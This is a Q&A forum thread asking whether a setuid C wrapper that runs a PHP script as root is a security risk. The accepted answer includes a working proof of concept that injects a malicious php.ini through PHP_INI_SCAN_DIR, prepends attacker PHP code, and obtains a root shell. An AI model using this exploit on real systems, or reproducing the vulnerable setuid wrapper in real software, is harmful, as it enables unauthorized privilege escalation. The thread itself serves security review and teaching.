Is the following setuid program a security risk?

Question

I have the following program in .c set as setuid chmod only read/execute by owner and will set it immutable, as i will the php script it invokes.

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main(int argc, char *argv[] )
{
   setuid( 0 );
   execv( "/var/tools/control.php", argv );

   return 0;
}

is this in itself a security risk ? is it possible to push other commands via argv or some other thing i didnt think of ? Im not asking about the php script just this proxy program.

score 7 · Accepted Answer · answered Feb 03 '14 at 23:35

7

Yes, it is a security risk.

$ cat <<EOF >/tmp/php.ini
auto_prepend_file=/tmp/owned.php
EOF

$ cat <<EOF >/tmp/owned.php
<?php
echo "Owned\n";
pcntl_exec("/usr/bin/sudo", array("sudo", "-i"));
?>
EOF

$ export PHP_INI_SCAN_DIR="/tmp"
$ /path/to/the/setuid/wrapper
Owned
# id
uid=0(root) gid=0(root) groups=0(root) context=staff_u:sysadm_r:sysadm_t:s0-s0:c0.c1023

And this is why you should avoid using setuid binaries.

answered Feb 03 '14 at 23:35

Matthew Ife

23,357
3
55
72

Owned indeed. :) thats why I asked, for now ill try removing all env vars but i guess some time ill need to eliminate the setuid alltogether or do all root stuff in .c . Thanks for the PoC – n00b32 Feb 03 '14 at 23:46

Is the following setuid program a security risk?

1 Answers1